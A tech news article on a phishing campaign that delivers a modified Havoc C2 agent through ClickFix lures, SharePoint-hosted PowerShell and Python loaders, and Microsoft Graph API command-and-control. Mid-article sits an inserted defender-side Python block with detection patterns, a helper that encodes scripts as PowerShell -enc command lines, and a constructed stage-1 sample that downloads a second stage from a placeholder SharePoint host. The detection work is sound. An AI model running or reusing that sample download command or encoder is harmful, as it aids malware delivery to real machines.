
Havoc C2 framework exploited via SharePoint in phishing campaign


A newly discovered phishing campaign is leveraging the open-source Havoc command-and-control (C2) framework in a multi-stage attack designed to evade detection. This campaign integrates ClickFix phishing tactics, PowerShell, and Python scripts with a modified Havoc Demon Agent, using the Microsoft Graph API to disguise C2 communication within trusted cloud services.

The attack begins with a phishing email containing an HTML attachment named ‘Documents.html.’ The email employs urgency to prompt the recipient into opening the attachment — a technique often used by threat actors. The threat actors use ClickFix, embedding a fake error message that tricks users into manually executing a malicious PowerShell command.

On decoding the base64-encoded script within the attachment, researchers discovered a PowerShell command that downloads a remote script hosted on a SharePoint site controlled by the attackers.

The script first checks for sandbox environments by counting domain computers, deleting specific registry entries as an infection marker, and ensuring the presence of a Python interpreter before executing a malicious Python script.
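As an added defender-side illustration (not code from Fortinet's report or from the campaign), the Python below decodes a PowerShell -EncodedCommand argument the way powershell.exe does (base64 over UTF-16LE) and flags a command line that combines the stage-1 traits described above. The sample script, the contoso.sharepoint.com URL and the cmdlet patterns are constructed assumptions, not indicators from the campaign.

```python
import base64
import re

# Heuristics for the stage-1 traits described above: a base64-encoded PowerShell
# command that fetches a script from SharePoint, counts domain computers, deletes
# registry values and checks for a Python interpreter. The cmdlet patterns are
# assumptions for illustration, not indicators published for this campaign.
INDICATORS = {
    "sharepoint_download": re.compile(r"https?://[\w.-]+\.sharepoint\.com/", re.I),
    "domain_computer_count": re.compile(r"Get-ADComputer|objectCategory=computer", re.I),
    "registry_delete": re.compile(
        r"Remove-Item(?:Property)?\b[^;]*\bHK(?:LM|CU|EY_\w+)|reg(?:\.exe)?\s+delete", re.I),
    "python_check": re.compile(r"\bpython(?:\.exe|\d)?\b", re.I),
}
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the script behind an -EncodedCommand switch, or None.
    PowerShell expects base64 over UTF-16LE, so decode the same way."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_command_line(cmdline):
    """Return (matched indicator names, escalate flag). A SharePoint fetch plus
    at least one host check is the minimum worth escalating for this chain."""
    script = decode_encoded_command(cmdline) or cmdline
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    return hits, "sharepoint_download" in hits and len(hits) >= 2

def build_cmdline(script):
    """Constructed fixture: wrap a script the way a ClickFix prompt would hand
    it to powershell.exe (base64 of UTF-16LE behind -enc)."""
    encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoProfile -enc {encoded}"

# Constructed, non-functional sample with placeholder names that mirrors the
# stage-1 behaviour described above; it is not the campaign's actual script.
SAMPLE_STAGE1 = (
    "$n=([adsisearcher]'objectCategory=computer').FindAll().Count; "
    "Remove-ItemProperty -Path 'HKCU:\\Software\\PLACEHOLDER' -Name 'marker'; "
    "if (Get-Command python -ErrorAction SilentlyContinue) { "
    "iwr 'https://contoso.sharepoint.com/sites/PLACEHOLDER/stage2.ps1' }"
)
```

Feeding process-creation or PowerShell script-block log command lines through triage_command_line gives a cheap first-pass filter; the decoded script, not the opaque base64 blob, is what the patterns are matched against.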

[Image: The phishing message. | Source: Fortinet]

The downloaded Python script, also hosted on SharePoint, is a shellcode loader. Executing the script reveals debug messages in Russian, indicating memory allocation, writing to memory, and shellcode execution. This script is key to deploying the final payload — leveraging the KaynLdr shellcode loader to execute an embedded DLL, which is a modified version of the Havoc Demon Agent.

Havoc is a well-known C2 framework used in both red teaming and cyberattacks. In this campaign, threat actors modified Havoc to leverage Microsoft Graph API for stealthy C2 communication. The attackers store command-and-control files within a SharePoint document library, utilising a hardcoded secret to obtain access tokens via the Microsoft Identity Platform.

As researchers discovered, these tokens allow the threat actors to create and manipulate files in SharePoint, establishing a covert communication channel. The C2 mechanism involves the agent sending an initial ‘CheckIn’ request containing victim metadata, including hostname, user details, OS information, and process details.

[Image: The attack flow explained. | Source: Fortinet]

All transmitted data is encrypted using AES-256 in CTR mode. The attacker’s commands are retrieved through specially crafted files in SharePoint, ensuring continued control over the compromised system.

Once the agent is connected, it enters a dispatcher routine to await further instructions from the attacker. The supported commands include reconnaissance, file manipulation, command execution, token manipulation, and Kerberos attacks.

“Public services once again play a crucial role in the attack campaign, now further integrated with modified Havoc Demon to hide malicious communication within the Microsoft Graph API, making identification and detection even more challenging,” researchers concluded.


Kumar Hemant


Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me
